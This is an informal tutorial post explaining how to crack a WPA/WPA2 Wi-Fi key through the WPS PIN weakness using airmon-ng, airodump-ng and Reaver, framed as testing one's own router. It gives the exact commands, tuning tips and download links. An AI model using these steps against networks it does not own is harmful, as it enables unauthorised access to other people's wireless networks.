What is it? well, it's an wpa/wpa2 cracker. it's useful if you want to test YOUR router security.
How it works? well it uses an "exploit" found by a guy on the wps system.
It's well explained here http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf
I tried it on my router and it took 14 hours (exactly 51000 secs) to crack it.
why it takes so much time? well it started from a really low pin.
how to get it working?
it's really easy:
Open a terminal and run as root:
airmon-ng start wlan0
Then it will enable monitor mode on that wireless device (wlan0)
Now you need to find the mac of your router, how?
always as root run:
This command will show you all the wireless devices on near you. you need to take the mac of YOUR router and then run this (again, always as root):
reaver -i mon0 -b 00:01:02:03:04:05 -vv
it will start to crack the key.
to test this tool i used ubuntu 10.04 with a wireless device that use ath5k driver
if you want more performance, i saw that if you keep opened on an another terminal airodump-ng mon0 --channel N (with N as your router channel) it will help you to keep mon0 on the right channel, because reaver is not perfect and it needs more improvements.
If you see some Warning messages like these:
[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: MY_ROUTER) [!] WARNING: Receive timeout occurred [!] WARNING: Last message not processed properly, reverting state to previous message
You will need to be nearer to the router with the wifi device.
Where to download this tool? here: http://code.google.com/p/reaver-wps/
Sorry for my bad english, i'm italian :p